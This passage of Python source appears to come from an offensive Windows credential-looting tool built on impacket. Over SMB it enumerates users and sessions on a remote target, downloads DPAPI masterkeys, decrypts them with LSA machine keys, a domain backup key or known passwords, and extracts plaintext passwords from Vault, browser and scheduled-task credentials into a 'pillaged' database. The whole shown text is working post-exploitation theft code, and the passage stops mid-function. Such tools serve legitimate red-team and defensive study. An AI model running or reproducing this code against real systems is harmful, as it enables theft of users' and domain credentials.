info+=f"LastWritten : {datetime.utcfromtimestamp(impacket.dpapi.getUnixTime(decrypted_blob['LastWritten']))}\n"
|
|
info+=f"Flags : {decrypted_blob['Flags']} ({impacket.dpapi.getFlags(impacket.dpapi.CREDENTIAL_FLAGS, decrypted_blob['Flags'])})\n"
|
|
info+=f"Persist : 0x{decrypted_blob['Persist']} ({impacket.dpapi.CREDENTIAL_PERSIST(decrypted_blob['Persist']).name})\n"
|
|
info+=f"Type : 0x{decrypted_blob['Type']} ({impacket.dpapi.CREDENTIAL_PERSIST(decrypted_blob['Type']).name})\n"
|
|
except Exception as ex:
|
|
self.logging.debug( f"[{self.options.target_ip}] {bcolors.WARNING}Exception 1 decrypted_blob.attributes {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
info+=f"Target : {decrypted_blob['Target'].decode('utf-16le')}\n"
|
|
info+=f"Description : {decrypted_blob['Description'].decode('utf-16le')}\n"
|
|
info+=f"Unknown : {decrypted_blob['Unknown'].decode('utf-16le')}\n"
|
|
info+=f"Username : {decrypted_blob['Username'].decode('utf-16le')}\n"
|
|
try:
|
|
info+=f"Unknown3 : {decrypted_blob['Unknown3'].decode('utf-16le')}\n"
|
|
password=decrypted_blob['Unknown3'].decode('utf-16le')
|
|
except UnicodeDecodeError:
|
|
info+=f"Unknown3. : {decrypted_blob['Unknown3'].decode('latin-1')}\n"
|
|
password=decrypted_blob['Unknown3'].decode('latin-1')
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='taskscheduler',
|
|
credz_username=decrypted_blob['Username'].decode('utf-16le'),
|
|
credz_password=password,
|
|
credz_target=decrypted_blob['Target'].decode('utf-16le'),
|
|
credz_path=localfile,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
self.logging.debug(info)
|
|
return info
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception 3 dump_credential_blob {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def process_decrypted_vault(self,user,secret_file):#data ,user ,localfile,blob_type,args=[]):
|
|
try:
|
|
self.logging.debug(f"[{self.options.target_ip}] [+] process_decrypted_vault of {secret_file} {bcolors.ENDC}")
|
|
blob_type = secret_file['type']
|
|
localfile = secret_file['path']
|
|
data = secret_file['data']
|
|
|
|
if blob_type=='vault' or blob_type=='vcrd':
|
|
try:
|
|
vault_name = secret_file['vault_name']#args[0]
|
|
vault_type = secret_file['vault_type']#args[1]
|
|
self.logging.debug(f"Processing Vault {vault_name} - type : {vault_type} ")
|
|
if vault_type == 'WinBio Key':
|
|
data = self.dump_VAULT_WIN_BIO_KEY(user,localfile,data)
|
|
self.logsecret(f"Vault {vault_name} : {data} ")
|
|
elif vault_type == 'NGC Local Account Logon Vault Credential':
|
|
data = self.dump_VAULT_NGC_LOCAL_ACCOOUNT(user,localfile,data)
|
|
self.logsecret(f"Vault {vault_name} : {data} ")
|
|
elif "NGC" in vault_type :
|
|
data = self.dump_VAULT_NGC_ACCOOUNT(user,localfile,data)
|
|
self.logsecret(f"Vault {vault_name} : {data} ")
|
|
elif vault_type == 'Internet Explorer':
|
|
data = self.dump_VAULT_INTERNET_EXPLORER(user,localfile,data)
|
|
|
|
#user.secrets["Vault:%s" % vault_name] = data
|
|
secret_file['secret'] = data
|
|
self.dump_to_file(localfile, data)
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Except 1 process_decrypted_data Vault for {localfile} {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Except 2 process_decrypted_data ALL for {localfile} {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def dump_VAULT_INTERNET_EXPLORER(self,user,localfile,vault_blob):
|
|
try:
|
|
self.logging.debug("Formating VAULT_INTERNET_EXPLORER info")
|
|
retval = "[Internet Explorer]\n"
|
|
retval += f"Username : {vault_blob['Username'].decode('utf-16le')} \n"
|
|
retval += f"Resource : {vault_blob['Resource'].decode('utf-16le')} \n"
|
|
retval += f"Password : {vault_blob['Password'].decode('utf-16le')} : {hexlify(vault_blob['Password'])} \n"
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='browser-internet_explorer',
|
|
credz_username=f"{vault_blob['Username'].decode('utf-16le')}",
|
|
credz_password=f"{vault_blob['Password'].decode('utf-16le')}",
|
|
credz_target=f"{vault_blob['Resource'].decode('utf-16le')}",
|
|
credz_path=localfile,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
self.logging.info(f"[{self.options.target_ip}] [+] {bcolors.OKGREEN} [IE/EDGE Password] {bcolors.ENDC} for {vault_blob['Resource'].decode('utf-16le')} [ {bcolors.OKBLUE}{vault_blob['Username'].decode('utf-16le')} : {vault_blob['Password'].decode('utf-16le')}{bcolors.ENDC} ]")
|
|
return retval
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception dump_VAULT_INTERNET_EXPLORER{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def dump_VAULT_WIN_BIO_KEY(self,user,localfile,vault_blob):
|
|
try:
|
|
self.logging.debug("Dumping VAULT_WIN_BIO_KEY info to file")
|
|
retval ="\n[WINDOWS BIOMETRIC KEY]\n"
|
|
retval +='Sid : %s\n' % RPC_SID(b'\x05\x00\x00\x00' + vault_blob['Sid']).formatCanonical()
|
|
retval +=f"Friendly Name: {vault_blob['Name'].decode('utf-16le')}\n"
|
|
retval +=f"Biometric Key: 0x{hexlify(vault_blob['BioKey']['bKey']).decode('latin-1')}\n"
|
|
return retval
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception dump_VAULT_WIN_BIO_KEY {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def dump_VAULT_NGC_LOCAL_ACCOOUNT(self,user,localfile,vault_blob):
|
|
try:
|
|
self.logging.debug("Dumping NGC_LOCAL_ACCOOUNT info to file")
|
|
retval ="\n[NGC LOCAL ACCOOUNT]\n"
|
|
retval +='UnlockKey : %s\n' % hexlify(vault_blob["UnlockKey"])
|
|
retval +='IV : %s\n' % hexlify(vault_blob["IV"])
|
|
retval +='CipherText : %s\n' % hexlify(vault_blob["CipherText"])
|
|
return retval
|
|
except Exception as ex:
|
|
self.logging.debug( f"[{self.options.target_ip}] {bcolors.WARNING}Exception dump_NGC_LOCAL_ACCOOUNT {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def dump_VAULT_NGC_ACCOOUNT(self,user,localfile,vault_blob):
|
|
try:
|
|
self.logging.debug("Dumping VAULT_NGC_ACCOOUNT info to file")
|
|
retval ="\n[NGC VAULT]\n"
|
|
retval +='Sid : %s\n' % RPC_SID(b'\x05\x00\x00\x00' + vault_blob['Sid']).formatCanonical()
|
|
retval +='Friendly Name: %s\n' % vault_blob['Name'].decode('utf-16le')
|
|
#A completer ?
|
|
vault_blob['Blob'].dump()
|
|
|
|
return retval
|
|
except Exception as ex:
|
|
self.logging.debug( f"[{self.options.target_ip}] {bcolors.WARNING}Exception dump_VAULT_NGC_ACCOOUNT{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
|
|
|
|
|
|
def do_who(self):
|
|
#if self.loggedIn is False:
|
|
# self.logging.error("Not logged in")
|
|
# return
|
|
rpctransport = transport.SMBTransport(self.smb.getRemoteHost(), filename=r'\srvsvc',
|
|
smb_connection=self.smb)
|
|
dce = rpctransport.get_dce_rpc()
|
|
dce.connect()
|
|
dce.bind(srvs.MSRPC_UUID_SRVS)
|
|
resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 10)
|
|
|
|
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
|
|
self.logging.info("host: %15s, user: %5s, active: %5d, idle: %5d" % (
|
|
session['sesi10_cname'][:-1], session['sesi10_username'][:-1], session['sesi10_time'],
|
|
session['sesi10_idle_time']))
|
|
self.db.add_connected_user(username=session['sesi10_username'][:-1], ip=session['sesi10_cname'][:-1])
|
|
|
|
|
|
def get_users(self):
|
|
self.logging.debug("Listing Users by enumerating directories in $Share\\Users")
|
|
blacklist = ['.', '..', 'desktop.ini']
|
|
shares = self.myfileops.get_shares()
|
|
#Intégrer les users share du premier test
|
|
if 'C$' in shares: # Most likely
|
|
self.myfileops.do_use('C$')
|
|
#self.myfileops.pwd = 'Users'
|
|
completion=self.myfileops.do_ls('Users','*', display=False)
|
|
for infos in completion:
|
|
longname, is_directory = infos
|
|
if is_directory and longname not in blacklist:
|
|
for user in self.users:
|
|
if longname == user.username:
|
|
break
|
|
else:
|
|
self.users.append(MyUser(longname,self.logging,self.options))
|
|
self.logging.info(f"[{self.options.target_ip}] [+] Found user {bcolors.OKBLUE}{longname}{bcolors.ENDC}")
|
|
user=self.GetUserByName(longname)
|
|
self.db.add_user(username=user.username, pillaged_from_computer_ip=self.options.target_ip)
|
|
user.share='C$'
|
|
else:
|
|
for share in shares:
|
|
self.myfileops.do_use(share)
|
|
#self.pwd = 'Users'
|
|
completion=self.myfileops.do_ls('Users','*', display=False)
|
|
for infos in completion:
|
|
longname, is_directory = infos
|
|
if is_directory and longname not in blacklist:
|
|
for user in self.users:
|
|
if longname == user['username']:
|
|
break
|
|
else:
|
|
self.users.append(MyUser(longname,self.logging,self.options))
|
|
self.logging.debug(f"[{self.options.target_ip}] Found user {bcolors.OKBLUE}{longname}{bcolors.ENDC}")
|
|
user = self.GetUserByName(longname)
|
|
self.db.add_user(username=user.username, pillaged_from_computer_ip=self.options.target_ip)
|
|
user.share = share
|
|
#+ADD LOCAL MACHINE ACCOUNT
|
|
user = MyUser("MACHINE$", self.logging, self.options)
|
|
user.type = 'MACHINE'
|
|
user.share = 'C$'
|
|
self.users.append(user)
|
|
self.db.add_user(username=user.username, pillaged_from_computer_ip=self.options.target_ip)
|
|
return self.users
|
|
|
|
def get_masterkeys(self):
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}[+] Gathering masterkeys on the target{bcolors.ENDC}")
|
|
blacklist = ['.', '..']
|
|
# self.get_shares()
|
|
#self.get_users()
|
|
for user in self.users:
|
|
if user.username != 'MACHINE$':
|
|
try:
|
|
tmp_pwd = ntpath.join(ntpath.join('Users', user.username),'AppData\\Roaming\\Microsoft\\Protect')
|
|
self.logging.debug(f"[{self.options.target_ip}] Looking for {bcolors.OKBLUE}{user.username}{bcolors.ENDC} Masterkey in %s" % tmp_pwd)
|
|
my_directory = self.myfileops.do_ls(tmp_pwd,'', display=True)
|
|
for infos in my_directory:
|
|
try:
|
|
longname, is_directory = infos
|
|
if longname not in blacklist:
|
|
self.logging.debug(f"[{self.options.target_ip}] Analysing {longname} for Masterkeys")
|
|
if is_directory and longname[:2] == 'S-': # SID
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}{user.username}{bcolors.ENDC} - Found SID {longname}")
|
|
user.sid = longname
|
|
if user.sid.startswith('S-1-5-80'):
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.FAIL}{user.username}{bcolors.ENDC} - Found AD CONNECT SID {longname}")
|
|
user.is_adconnect = True
|
|
#user.check_usertype()
|
|
tmp_pwd2 = ntpath.join(tmp_pwd, longname)
|
|
my_directory2 = self.myfileops.do_ls(tmp_pwd2,'', display=False)
|
|
for infos2 in my_directory2:
|
|
longname2, is_directory2 = infos2
|
|
if not is_directory2 and is_guid(longname2): # GUID
|
|
self.download_masterkey(user, tmp_pwd2, longname2, type='USER')
|
|
elif is_directory:
|
|
self.logging.debug(f"[{self.options.target_ip}] Found Directory %s -> doing nothing" % longname)
|
|
else:
|
|
self.logging.debug(f"[{self.options.target_ip}] Found file %s" % longname)
|
|
if "CREDHIST" in longname:
|
|
self.download_credhist(user, tmp_pwd, longname, type='USER')
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception in get_masterkeys for {longname}{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
continue
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Exception get_masterkeys{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
continue
|
|
##MACHINE MASTERKEYS
|
|
try:
|
|
user=self.GetUserByName('MACHINE$')
|
|
#Make a "MACHINE$" user
|
|
"""user=MyUser("MACHINE$",self.logging,self.options)
|
|
user.type='MACHINE'
|
|
self.users.append(user)"""
|
|
|
|
tmp_pwd = 'Windows\\System32\\Microsoft\\Protect'#Add Windows\ServiceProfiles\ADSync\AppData\Roaming\Microsoft\Protect\ for ADConnect ?
|
|
self.logging.debug(f"[{self.options.target_ip}] Looking for Machine Masterkey in %s" % tmp_pwd)
|
|
my_directory = self.myfileops.do_ls(tmp_pwd,'', display=False)
|
|
for infos in my_directory:
|
|
longname, is_directory = infos
|
|
if longname not in blacklist:
|
|
if is_directory and longname[:2] == 'S-': # SID
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}{user.username}{bcolors.ENDC} - Found SID {longname}")
|
|
user.sid = longname
|
|
if user.sid.startswith('S-1-5-80'):
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.FAIL}{user.username}{bcolors.ENDC} - Found AD CONNECT SID {longname}")
|
|
user.is_adconnect = True
|
|
tmp_pwd2 = ntpath.join(tmp_pwd, longname)
|
|
my_directory2 = self.myfileops.do_ls(tmp_pwd2,'', display=False)
|
|
for infos2 in my_directory2:
|
|
longname2, is_directory2 = infos2
|
|
if longname2 not in blacklist:
|
|
if not is_directory2 and is_guid(longname2): # GUID
|
|
# Downloading file
|
|
self.download_masterkey(user, tmp_pwd2, longname2, type='MACHINE')
|
|
elif is_directory2 and longname2=='User': #On se limite a ca pour le moment
|
|
tmp_pwd3 = ntpath.join(tmp_pwd2, longname2)
|
|
my_directory3 = self.myfileops.do_ls(tmp_pwd3,'', display=False)
|
|
for infos3 in my_directory3:
|
|
longname3, is_directory3 = infos3
|
|
if longname3 not in blacklist:
|
|
if not is_directory3 and is_guid(longname3): # GUID
|
|
self.logging.debug(f"[{self.options.target_ip}] {user.username} - Found GUID {longname3}")
|
|
# Downloading file
|
|
self.download_masterkey(user, tmp_pwd3, longname3, type='MACHINE-USER')
|
|
else:
|
|
self.logging.debug(
|
|
"Found unexpected file/directory %s in %s" % (tmp_pwd3, longname3))
|
|
else:
|
|
self.logging.debug("Found unexpected file/directory %s in %s"%(tmp_pwd2,longname2))
|
|
elif is_directory:
|
|
self.logging.debug("Found (not SID) Directory %s" % longname)
|
|
else:
|
|
self.logging.debug("Found file %s" % longname)
|
|
if "CREDHIST" in longname:
|
|
self.download_credhist(user, tmp_pwd, longname, type='MACHINE')
|
|
|
|
except Exception as ex:
|
|
self.logging.error(f"[{self.options.target_ip}] {bcolors.FAIL}Error in GetMasterkey (Machine){bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}[-] Gathered Masterkeys for {len(self.users)} users{bcolors.ENDC}")
|
|
|
|
def download_credhist(self,user, tmp_pwd, longname, type='MACHINE'):
|
|
# Downloading file
|
|
try:
|
|
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] [...] Downloading CREDHIST {user.username} {tmp_pwd} {longname}")
|
|
#from lib.dpapi_pick.credhist import CredHistFile
|
|
#localfile = self.myfileops.get_file(ntpath.join(tmp_pwd, longname))
|
|
'''f=open(localfile,'rb')
|
|
credhistdata = f.read()
|
|
f.close()
|
|
myCredhistfile = CredHistFile(raw=credhistdata)
|
|
|
|
print(repr(myCredhistfile))
|
|
#myCredhistfile = CredHistFile(raw=credhistdata)
|
|
for username in self.options.credz:
|
|
if username in user.username: # pour fonctionner aussi avec le .domain ou les sessions multiple citrix en user.domain.001 ?
|
|
self.logging.debug(f"[{self.options.target_ip}] [...] Testing {len(self.options.credz[username])} credz for user {user.username} CREDHIST")
|
|
for password in self.options.credz[username]:
|
|
ret=myCredhistfile.decryptWithPassword(password)
|
|
print(ret)
|
|
'''
|
|
except Exception as ex:
|
|
self.logging.error(f"[{self.options.target_ip}] {bcolors.FAIL}Error in Decrypting Credhist{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
|
|
|
|
|
|
def download_masterkey(self,user,path,guid,type):
|
|
guid=guid.lower()
|
|
if is_guid(guid):
|
|
self.logging.debug(f"[{self.options.target_ip}] {user.username} - Found GUID {guid}")
|
|
# Downloading file
|
|
localfile = self.myfileops.get_file(ntpath.join(path, guid))
|
|
#Get Type and hash
|
|
try:
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.sid = user.sid
|
|
myoptions.username = user.username
|
|
myoptions.pvk = None
|
|
myoptions.file = localfile # Masterkeyfile to parse
|
|
#myoptions.key = key.decode("utf-8")
|
|
mydpapi = DPAPI(myoptions, self.logging)
|
|
if self.options.GetHashes == True:
|
|
masterkey_hash,is_domain_sid = mydpapi.get_masterkey_hash(generate_hash=True)
|
|
else :
|
|
masterkey_hash, is_domain_sid = mydpapi.get_masterkey_hash(generate_hash=False)
|
|
except Exception as ex:
|
|
self.logging.error(f"[{self.options.target_ip}] {bcolors.FAIL}Error in DownloadMasterkey - get_masterkey_hash{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
try:
|
|
user.masterkeys_file[guid]={}
|
|
user.masterkeys_file[guid]['path'] = localfile
|
|
user.masterkeys_file[guid]['status'] = 'encrypted'
|
|
if self.options.GetHashes == True:
|
|
user.masterkeys_file[guid]['hash'] = masterkey_hash
|
|
if is_domain_sid :
|
|
type='DOMAIN'
|
|
user.type_validated = True
|
|
user.type = type #LOCAL,DOMAIN,MACHINE,MACHINE-USER
|
|
self.db.add_sid(username=user.username,sid=user.sid)
|
|
self.db.add_masterkey(file_path=user.masterkeys_file[guid]['path'], guid=guid,status=user.masterkeys_file[guid]['status'],pillaged_from_computer_ip=self.options.target_ip,pillaged_from_username=user.username)
|
|
if self.options.GetHashes == True:
|
|
for hash in user.masterkeys_file[guid]['hash']:
|
|
self.db.add_dpapi_hash(file_path=user.masterkeys_file[guid]['path'], sid=user.sid, guid=guid, hash=hash, context=type, pillaged_from_computer_ip=self.options.target_ip)
|
|
except Exception as ex:
|
|
self.logging.error(f"[{self.options.target_ip}] {bcolors.FAIL}Error in Database entry - download_masterkey_hash{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def get_masterkey(self,user,guid,type):
|
|
guid=guid.lower()
|
|
if guid not in user.masterkeys_file :
|
|
self.logging.debug( f"[{self.options.target_ip}] [!] {bcolors.FAIL}{user.username}{bcolors.ENDC} masterkey {guid} not found")
|
|
return -1
|
|
else:
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] {bcolors.OKBLUE}{user.username}{bcolors.ENDC} masterkey {guid} Found")
|
|
if user.masterkeys_file[guid]['status'] == 'decrypted':
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] {bcolors.OKBLUE}{user.username}{bcolors.ENDC} masterkey {guid} already decrypted")
|
|
return user.masterkeys_file[guid]
|
|
elif user.masterkeys_file[guid]['status'] == 'encrypted':
|
|
return self.decrypt_masterkey(user,guid,type)
|
|
|
|
|
|
def decrypt_masterkey(self,user,guid,type=''):
|
|
self.logging.debug(f"[{self.options.target_ip}] [...] Decrypting {bcolors.OKBLUE}{user.username}{bcolors.ENDC} masterkey {guid} of type {type} (type_validated={user.type_validated}/user.type={user.type})")
|
|
guid=guid.lower()
|
|
if guid not in user.masterkeys_file :
|
|
self.logging.debug( f"[{self.options.target_ip}] [!] {bcolors.FAIL}{user.username}{bcolors.ENDC} masterkey {guid} not found")
|
|
return -1
|
|
localfile=user.masterkeys_file[guid]['path']
|
|
|
|
if user.masterkeys_file[guid]['status'] == 'decrypted':
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] {bcolors.OKBLUE}{user.username}{bcolors.ENDC} masterkey {guid} already decrypted")
|
|
return user.masterkeys_file[guid]
|
|
else:
|
|
if user.type_validated == True:
|
|
type=user.type
|
|
|
|
if type == 'MACHINE':
|
|
# Try de decrypt masterkey file
|
|
for key in self.machine_key:
|
|
self.logging.debug(f"[{self.options.target_ip}] [...] Decrypting {bcolors.OKBLUE}{user.username}{bcolors.ENDC} masterkey {guid} with MACHINE_Key from LSA {key.decode('utf-8')}")
|
|
try:
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.sid=None#user.sid
|
|
myoptions.username=user.username
|
|
myoptions.pvk = None
|
|
myoptions.file = localfile # Masterkeyfile to parse
|
|
myoptions.key = key.decode("utf-8")
|
|
mydpapi = DPAPI(myoptions,self.logging)
|
|
decrypted_masterkey = mydpapi.decrypt_masterkey()
|
|
if decrypted_masterkey!= None and decrypted_masterkey!= -1:
|
|
#self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKGREEN}[...] Maserkey {bcolors.ENDC}{localfile} {bcolors.ENDC}: {decrypted_masterkey}" )
|
|
user.masterkeys_file[guid]['status'] = 'decrypted'
|
|
user.masterkeys_file[guid]['key'] = decrypted_masterkey
|
|
#user.masterkeys[localfile] = decrypted_masterkey
|
|
user.type='MACHINE'
|
|
user.type_validated = True
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}Decryption successfull {bcolors.ENDC} of Masterkey {guid} for Machine {bcolors.OKGREEN} {user.username}{bcolors.ENDC} \nKey: {decrypted_masterkey}")
|
|
self.db.update_masterkey(file_path=user.masterkeys_file[guid]['path'], guid=guid,
|
|
status=user.masterkeys_file[guid]['status'],decrypted_with="MACHINE-KEY",decrypted_value=decrypted_masterkey,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
return user.masterkeys_file[guid]
|
|
else:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING} MACHINE-Key from LSA {key.decode('utf-8')} can't decode {bcolors.OKBLUE}{user.username}{bcolors.ENDC} Masterkey {guid}{bcolors.ENDC}")
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Exception {bcolors.WARNING} MACHINE-Key from LSA {key.decode('utf-8')} can't decode {bcolors.OKBLUE}{user.username}{bcolors.ENDC} Masterkey {guid}{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
else:
|
|
#if user.type_validated == False:
|
|
self.decrypt_masterkey(user, guid, type='MACHINE-USER')
|
|
|
|
elif type == 'MACHINE-USER':
|
|
# Try de decrypt masterkey file
|
|
for key in self.user_key:
|
|
self.logging.debug(f"[{self.options.target_ip}] [...] Decrypting {bcolors.OKBLUE}{user.username}{bcolors.ENDC} masterkey {guid} with MACHINE-USER_Key from LSA {key.decode('utf-8')}")#and SID %s , user.sid ))
|
|
try:
|
|
#key1, key2 = deriveKeysFromUserkey(tsid, userkey)
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.file = localfile # Masterkeyfile to parse
|
|
if user.is_adconnect is True:
|
|
myoptions.key = key.decode("utf-8")
|
|
myoptions.sid = user.sid
|
|
else :
|
|
myoptions.key = key.decode("utf-8")#None
|
|
myoptions.sid = None#user.sid
|
|
|
|
myoptions.username = user.username
|
|
myoptions.pvk = None
|
|
mydpapi = DPAPI(myoptions,self.logging)
|
|
decrypted_masterkey = mydpapi.decrypt_masterkey()
|
|
if decrypted_masterkey != -1 and decrypted_masterkey!=None:
|
|
#self.logging.debug(f"[{self.options.target_ip}] Decryption successfull {bcolors.ENDC}: {decrypted_masterkey}")
|
|
user.masterkeys_file[guid]['status'] = 'decrypted'
|
|
user.masterkeys_file[guid]['key'] = decrypted_masterkey
|
|
#user.masterkeys[localfile] = decrypted_masterkey
|
|
user.type = 'MACHINE-USER'
|
|
user.type_validated = True
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}Decryption successfull {bcolors.ENDC} of Masterkey {guid} for Machine {bcolors.OKGREEN} {user.username}{bcolors.ENDC} \nKey: {decrypted_masterkey}")
|
|
self.db.update_masterkey(file_path=user.masterkeys_file[guid]['path'], guid=guid,
|
|
status=user.masterkeys_file[guid]['status'],
|
|
decrypted_with="MACHINE-USER", decrypted_value=decrypted_masterkey,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
return user.masterkeys_file[guid]
|
|
else:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING} MACHINE-USER_Key from LSA {key.decode('utf-8')} can't decode {bcolors.OKBLUE}{user.username}{bcolors.WARNING} Masterkey {guid}{bcolors.ENDC}")
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Exception {bcolors.WARNING} MACHINE-USER_Key from LSA {key.decode('utf-8')} can't decode {bcolors.OKBLUE}{user.username}{bcolors.WARNING} Masterkey {guid}{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
else:
|
|
if user.type_validated == False and not user.is_adconnect:
|
|
return self.decrypt_masterkey(user, guid, type='DOMAIN')
|
|
|
|
elif type=='DOMAIN' and self.options.pvk is not None :
|
|
#For ADConnect
|
|
if user.is_adconnect is True:
|
|
return self.decrypt_masterkey(user, guid, type='MACHINE-USER')
|
|
# Try de decrypt masterkey file
|
|
self.logging.debug(f"[{self.options.target_ip}] [...] Decrypting {bcolors.OKBLUE}{user.username}{bcolors.ENDC} masterkey {guid} with Domain Backupkey {self.options.pvk}")
|
|
try:
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.file = localfile # Masterkeyfile to parse
|
|
myoptions.username = user.username
|
|
myoptions.sid = user.sid
|
|
mydpapi = DPAPI(myoptions,self.logging)
|
|
decrypted_masterkey = mydpapi.decrypt_masterkey()
|
|
if decrypted_masterkey != -1 and decrypted_masterkey!=None:
|
|
#self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKGREEN}Decryption successfull {bcolors.ENDC}: %s" % decrypted_masterkey)
|
|
user.masterkeys_file[guid]['status'] = 'decrypted'
|
|
user.masterkeys_file[guid]['key'] = decrypted_masterkey
|
|
#user.masterkeys[localfile] = decrypted_masterkey
|
|
user.type = 'DOMAIN'
|
|
user.type_validated = True
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}Decryption successfull {bcolors.ENDC} of Masterkey {guid} for user {bcolors.OKBLUE} {user.username}{bcolors.ENDC} \nKey: {decrypted_masterkey}")
|
|
self.db.update_masterkey(file_path=user.masterkeys_file[guid]['path'], guid=guid,
|
|
status=user.masterkeys_file[guid]['status'], decrypted_with="DOMAIN-PVK",
|
|
decrypted_value=decrypted_masterkey,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
return user.masterkeys_file[guid]
|
|
else:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Domain Backupkey {self.options.pvk} can't decode {bcolors.OKBLUE}{user.username}{bcolors.WARNING} Masterkey {guid} -> Checking with Local user with credz{bcolors.ENDC}")
|
|
if user.type_validated == False:
|
|
return self.decrypt_masterkey(user, guid, 'LOCAL')
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting {bcolors.OKBLUE}{user.username}{bcolors.ENDC} masterkey {guid} with Domain Backupkey (most likely user is only local user) -> Running for Local user with credz{bcolors.ENDC}")
|
|
self.logging.debug(f"exception was : {ex}")
|
|
if user.type_validated == False:
|
|
return self.decrypt_masterkey(user, guid, 'LOCAL')
|
|
|
|
#type==LOCAL
|
|
# On a des credz
|
|
if len(self.options.credz) > 0 and user.masterkeys_file[guid]['status'] != 'decrypted': #localfile not in user.masterkeys:
|
|
self.logging.debug(f"[{self.options.target_ip}] [...] Testing decoding {bcolors.OKBLUE}{user.username}{bcolors.ENDC} Masterkey {guid} with credz")
|
|
for username in self.options.credz:
|
|
if username.lower() in user.username.lower() :#pour fonctionner aussi avec le .domain ou les sessions multiple citrix en user.domain.001 ?
|
|
#self.logging.debug(f"[{self.options.target_ip}] [...] Testing {len(self.options.credz[username])} credz for user {user.username}")
|
|
#for test_cred in self.options.credz[user.username]:
|
|
try:
|
|
self.logging.debug(f"[{self.options.target_ip}]Trying to decrypt {bcolors.OKBLUE}{user.username}{bcolors.ENDC} Masterkey {guid} with user SID {user.sid} and {len(self.options.credz[username])}credential(s) from credz file")
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.file = localfile # Masterkeyfile to parse
|
|
#myoptions.password = self.options.credz[username]
|
|
myoptions.sid = user.sid
|
|
myoptions.pvk = None
|
|
myoptions.key = None
|
|
mydpapi = DPAPI(myoptions,self.logging)
|
|
decrypted_masterkey = mydpapi.decrypt_masterkey(passwords=self.options.credz[username])
|
|
if decrypted_masterkey != -1 and decrypted_masterkey!=None:
|
|
#self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKGREEN}Decryption successfull {bcolors.ENDC}: {decrypted_masterkey}")
|
|
user.masterkeys_file[guid]['status'] = 'decrypted'
|
|
user.masterkeys_file[guid]['key'] = decrypted_masterkey
|
|
#user.masterkeys[localfile] = decrypted_masterkey
|
|
user.type = 'LOCAL'
|
|
user.type_validated = True
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}Decryption successfull {bcolors.ENDC} of Masterkey {guid} for User {bcolors.OKGREEN} {user.username}{bcolors.ENDC} \nKey: {decrypted_masterkey}")
|
|
self.db.update_masterkey(file_path=user.masterkeys_file[guid]['path'], guid=guid,
|
|
status=user.masterkeys_file[guid]['status'],
|
|
